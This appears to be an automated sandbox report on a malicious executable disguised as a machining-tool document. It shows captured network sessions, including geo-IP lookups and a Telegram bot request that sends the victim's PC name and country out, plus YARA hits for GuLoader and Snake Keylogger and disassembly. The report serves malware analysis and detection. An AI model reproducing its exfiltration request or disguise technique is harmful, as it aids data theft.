                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        6192.168.11.2049715172.67.177.134443800C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2024-10-07 08:56:18 UTC63OUTGET /xml/191.96.150.187 HTTP/1.1
                                                                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                                                                        2024-10-07 08:56:18 UTC672INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:18 GMT
                                                                                                                                                                                                                        Content-Type: application/xml
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                                        Cache-Control: max-age=86400
                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                        Age: 3
                                                                                                                                                                                                                        Last-Modified: Mon, 07 Oct 2024 08:56:15 GMT
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ntUt7XNtYe6CvfCiD5EGg%2FDcDbjr0Q0B3iFVteZH91hve19U3TUat0PlDlzXE3Etvcb5AwRRp9oiZFX0UzC3i7ENoEiOkCwIjRqjxpWkF1%2FOQsU3ZC5LKSI%2BGHruIJ7HOBEVYqUU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8cecad5aab7d438a-EWR
                                                                                                                                                                                                                        2024-10-07 08:56:18 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54
                                                                                                                                                                                                                        Data Ascii: 16a<Response><IP>191.96.150.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                                                                                                                                                                                        2024-10-07 08:56:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        7192.168.11.2049716172.67.177.134443800C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2024-10-07 08:56:18 UTC63OUTGET /xml/191.96.150.187 HTTP/1.1
                                                                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                                                                        2024-10-07 08:56:19 UTC678INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:19 GMT
                                                                                                                                                                                                                        Content-Type: application/xml
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                                        Cache-Control: max-age=86400
                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                        Age: 4
                                                                                                                                                                                                                        Last-Modified: Mon, 07 Oct 2024 08:56:15 GMT
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UNo%2Bk5VgMrFnZ1y1Ywn0%2BG0Q%2FtRDgyrw8YdzggwHl28ekLMIsOKZ4Ro6nx%2FYiWCIRWDJsH6UMB3433Okbw8TM3nvtZtPOScAkYB%2Bsk859egYf2n3BV8TcwSP4M%2Fw7m9AMYqbumiW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8cecad5ebbb9423a-EWR
                                                                                                                                                                                                                        2024-10-07 08:56:19 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54
                                                                                                                                                                                                                        Data Ascii: 16a<Response><IP>191.96.150.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                                                                                                                                                                                        2024-10-07 08:56:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        8192.168.11.2049717172.67.177.134443800C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2024-10-07 08:56:19 UTC63OUTGET /xml/191.96.150.187 HTTP/1.1
                                                                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                                                                        2024-10-07 08:56:19 UTC674INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:19 GMT
                                                                                                                                                                                                                        Content-Type: application/xml
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                                        Cache-Control: max-age=86400
                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                        Age: 4
                                                                                                                                                                                                                        Last-Modified: Mon, 07 Oct 2024 08:56:15 GMT
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GJpD%2B1dbNzF2%2BYVv8X7uPuyqNUJTWhX7WaWcGIdtC%2B5fDOXeHZ7JFRaV0CMuD8e1peTvFR5XvFMqUClAE1TTFc2IahP%2FghnclDS7lY3PK4s1vHd02oh2zFonq5RgG3BGksEDWSLB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8cecad62c83d0f46-EWR
                                                                                                                                                                                                                        2024-10-07 08:56:19 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54
                                                                                                                                                                                                                        Data Ascii: 16a<Response><IP>191.96.150.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                                                                                                                                                                                        2024-10-07 08:56:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        9192.168.11.2049718172.67.177.134443800C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2024-10-07 08:56:20 UTC63OUTGET /xml/191.96.150.187 HTTP/1.1
                                                                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                                                                        2024-10-07 08:56:20 UTC674INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:20 GMT
                                                                                                                                                                                                                        Content-Type: application/xml
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                                        Cache-Control: max-age=86400
                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                        Age: 5
                                                                                                                                                                                                                        Last-Modified: Mon, 07 Oct 2024 08:56:15 GMT
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PNd9Y4AUqL9J5MZ3t21Dlg%2BWy8knD8P4g3k8D8gXa0QgoJSCXpgCcRn9Tn9BZ4pjPrFCY4Sq6OF2Aoog6sSxobpp%2BgyyTq9kv42KS0exq2OUI2BXccFjsANROj0t3%2Bkkziy9So%2BM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8cecad66cb148c15-EWR
                                                                                                                                                                                                                        2024-10-07 08:56:20 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54
                                                                                                                                                                                                                        Data Ascii: 16a<Response><IP>191.96.150.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                                                                                                                                                                                        2024-10-07 08:56:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        10192.168.11.2049719172.67.177.134443800C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2024-10-07 08:56:20 UTC63OUTGET /xml/191.96.150.187 HTTP/1.1
                                                                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                                                                        2024-10-07 08:56:20 UTC676INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:20 GMT
                                                                                                                                                                                                                        Content-Type: application/xml
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                                        Cache-Control: max-age=86400
                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                        Age: 5
                                                                                                                                                                                                                        Last-Modified: Mon, 07 Oct 2024 08:56:15 GMT
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YXjjMacnHFyRZ2j6kEs%2FzxMY5AKKg3vxYYrAvZ0ox2lhFL15b%2FTdPopUGs2gOB6PJhM1ROHgGsx5vQmwY%2B0Y%2FkM9mYdeYqxi3XLwyjCjT6E%2BJprSxIQP93P6hftxhWPu0s7peoBB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8cecad6adef5434c-EWR
                                                                                                                                                                                                                        2024-10-07 08:56:20 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54
                                                                                                                                                                                                                        Data Ascii: 16a<Response><IP>191.96.150.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                                                                                                                                                                                        2024-10-07 08:56:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        11192.168.11.2049720149.154.167.220443800C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2024-10-07 08:56:21 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:936905%0D%0ADate%20and%20Time:%2007/10/2024%20/%2004:56:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20936905%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                                                                                        Host: api.telegram.org
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        2024-10-07 08:56:21 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:21 GMT
                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                        Content-Length: 55
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                        2024-10-07 08:56:21 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                                                                                        Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                        Start time:04:55:08
                                                                                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        File size:751'715 bytes
                                                                                                                                                                                                                        MD5 hash:E7EBD3DE4BCBA42FEEE0D2BD98521920
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.1493431079.0000000000507000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.1493431079.0000000000515000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1494958612.000000000597D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                        Start time:04:56:00
                                                                                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        File size:751'715 bytes
                                                                                                                                                                                                                        MD5 hash:E7EBD3DE4BCBA42FEEE0D2BD98521920
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:19.3%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:14%
                                                                                                                                                                                                                          Signature Coverage:23.9%
                                                                                                                                                                                                                          Total number of Nodes:1506
                                                                                                                                                                                                                          Total number of Limit Nodes:39
                                                                                                                                                                                                                          execution_graph 4900 10001000 4903 1000101b 4900->4903 4910 100014bb 4903->4910 4905 10001020 4906 10001024 4905->4906 4907 10001027 GlobalAlloc 4905->4907 4908 100014e2 3 API calls 4906->4908 4907->4906 4909 10001019 4908->4909 4912 100014c1 4910->4912 4911 100014c7 4911->4905 4912->4911 4913 100014d3 GlobalFree 4912->4913 4913->4905 4914 4027c1 4915 402a1d 18 API calls 4914->4915 4916 4027c7 4915->4916 4917 402802 4916->4917 4918 4027eb 4916->4918 4923 4026a6 4916->4923 4920 402818 4917->4920 4921 40280c 4917->4921 4919 4027f0 4918->4919 4927 4027ff 4918->4927 4928 405cfd lstrcpynA 4919->4928 4922 405d1f 18 API calls 4920->4922 4924 402a1d 18 API calls 4921->4924 4922->4927 4924->4927 4927->4923 4929 405c5b wsprintfA 4927->4929 4928->4923 4929->4923 4930 401cc2 4931 402a1d 18 API calls 4930->4931 4932 401cd2 SetWindowLongA 4931->4932 4933 4028cf 4932->4933 4934 401a43 4935 402a1d 18 API calls 4934->4935 4936 401a49 4935->4936 4937 402a1d 18 API calls 4936->4937 4938 4019f3 4937->4938 4939 401e44 4940 402a3a 18 API calls 4939->4940 4941 401e4a 4940->4941 4942 404f16 25 API calls 4941->4942 4943 401e54 4942->4943 4944 40548e 2 API calls 4943->4944 4945 401e5a 4944->4945 4946 401eb0 CloseHandle 4945->4946 4947 401e79 WaitForSingleObject 4945->4947 4948 4026a6 4945->4948 4950 4060ce 2 API calls 4945->4950 4946->4948 4947->4945 4949 401e87 GetExitCodeProcess 4947->4949 4951 401ea2 4949->4951 4952 401e99 4949->4952 4950->4947 4951->4946 4954 405c5b wsprintfA 4952->4954 4954->4951 4955 402644 4956 40264a 4955->4956 4957 402652 FindClose 4956->4957 4958 4028cf 4956->4958 4957->4958 4959 406344 4961 4061c8 4959->4961 4960 406b33 4961->4960 4962 406252 GlobalAlloc 4961->4962 4963 406249 GlobalFree 4961->4963 4964 4062c0 GlobalFree 4961->4964 4965 4062c9 GlobalAlloc 4961->4965 4962->4960 4962->4961 4963->4962 4964->4965 4965->4960 4965->4961 4966 4026c6 4967 402a3a 18 API calls 4966->4967 4968 4026d4 4967->4968 4969 4026ea 4968->4969 4970 402a3a 18 API calls 4968->4970 4971 40594b 2 API calls 4969->4971 4970->4969 4972 4026f0 4971->4972 4994 405970 GetFileAttributesA CreateFileA 4972->4994 4974 4026fd 4975 4027a0 4974->4975 4976 402709 GlobalAlloc 4974->4976 4979 4027a8 DeleteFileA 4975->4979 4980 4027bb 4975->4980 4977 402722 4976->4977 4978 402797 CloseHandle 4976->4978 4995 403091 SetFilePointer 4977->4995 4978->4975 4979->4980 4982 402728 4983 40307b ReadFile 4982->4983 4984 402731 GlobalAlloc 4983->4984 4985 402741 4984->4985 4986 402775 4984->4986 4988 402e9f 36 API calls 4985->4988 4987 405a17 WriteFile 4986->4987 4989 402781 GlobalFree 4987->4989 4993 40274e 4988->4993 4990 402e9f 36 API calls 4989->4990 4992 402794 4990->4992 4991 40276c GlobalFree 4991->4986 4992->4978 4993->4991 4994->4974 4995->4982 4064 4022c7 4065 402a3a 18 API calls 4064->4065 4066 4022d8 4065->4066 4067 402a3a 18 API calls 4066->4067 4068 4022e1 4067->4068 4069 402a3a 18 API calls 4068->4069 4070 4022eb GetPrivateProfileStringA 4069->4070 4996 402847 4997 402a1d 18 API calls 4996->4997 4998 40284d 4997->4998 4999 40287e 4998->4999 5001 4026a6 4998->5001 5002 40285b 4998->5002 5000 405d1f 18 API calls 4999->5000 4999->5001 5000->5001 5002->5001 5004 405c5b wsprintfA 5002->5004 5004->5001 4199 1000270b 4200 1000275b 4199->4200 4201 1000271b VirtualProtect 4199->4201 4201->4200 5008 1000180d 5009 10001830 5008->5009 5010 10001860 GlobalFree 5009->5010 5011 10001872 5009->5011 5010->5011 5012 10001266 2 API calls 5011->5012 5013 100019e3 GlobalFree GlobalFree 5012->5013 4502 401751 4503 402a3a 18 API calls 4502->4503 4504 401758 4503->4504 4505 401776 4504->4505 4506 40177e 4504->4506 4541 405cfd lstrcpynA 4505->4541 4542 405cfd lstrcpynA 4506->4542 4509 40177c 4513 405f68 5 API calls 4509->4513 4510 401789 4511 40576f 3 API calls 4510->4511 4512 40178f lstrcatA 4511->4512 4512->4509 4532 40179b 4513->4532 4514 406001 2 API calls 4514->4532 4515 40594b 2 API calls 4515->4532 4517 4017b2 CompareFileTime 4517->4532 4518 401876 4520 404f16 25 API calls 4518->4520 4519 40184d 4521 404f16 25 API calls 4519->4521 4539 401862 4519->4539 4522 401880 4520->4522 4521->4539 4523 402e9f 36 API calls 4522->4523 4524 401893 4523->4524 4525 4018a7 SetFileTime 4524->4525 4526 4018b9 CloseHandle 4524->4526 4525->4526 4528 4018ca 4526->4528 4526->4539 4527 405d1f 18 API calls 4527->4532 4529 4018e2 4528->4529 4530 4018cf 4528->4530 4534 405d1f 18 API calls 4529->4534 4533 405d1f 18 API calls 4530->4533 4531 405cfd lstrcpynA 4531->4532 4532->4514 4532->4515 4532->4517 4532->4518 4532->4519 4532->4527 4532->4531 4540 405970 GetFileAttributesA CreateFileA 4532->4540 4543 4054f3 4532->4543 4536 4018d7 lstrcatA 4533->4536 4537 4018ea 4534->4537 4536->4537 4538 4054f3 MessageBoxIndirectA 4537->4538 4538->4539 4540->4532 4541->4509 4542->4510 4545 405508 4543->4545 4544 405554 4544->4532 4545->4544 4546 40551c MessageBoxIndirectA 4545->4546 4546->4544 5021 401651 5022 402a3a 18 API calls 5021->5022 5023 401657 5022->5023 5024 406001 2 API calls 5023->5024 5025 40165d 5024->5025 5026 401951 5027 402a1d 18 API calls 5026->5027 5028 401958 5027->5028 5029 402a1d 18 API calls 5028->5029 5030 401962 5029->5030 5031 402a3a 18 API calls 5030->5031 5032 40196b 5031->5032 5033 40197e lstrlenA 5032->5033 5035 4019b9 5032->5035 5034 401988 5033->5034 5034->5035 5039 405cfd lstrcpynA 5034->5039 5037 4019a2 5037->5035 5038 4019af lstrlenA 5037->5038 5038->5035 5039->5037 5040 4019d2 5041 402a3a 18 API calls 5040->5041 5042 4019d9 5041->5042 5043 402a3a 18 API calls 5042->5043 5044 4019e2 5043->5044 5045 4019e9 lstrcmpiA 5044->5045 5046 4019fb lstrcmpA 5044->5046 5047 4019ef 5045->5047 5046->5047 5048 4021d2 5049 402a3a 18 API calls 5048->5049 5050 4021d8 5049->5050 5051 402a3a 18 API calls 5050->5051 5052 4021e1 5051->5052 5053 402a3a 18 API calls 5052->5053 5054 4021ea 5053->5054 5055 406001 2 API calls 5054->5055 5056 4021f3 5055->5056 5057 402204 lstrlenA 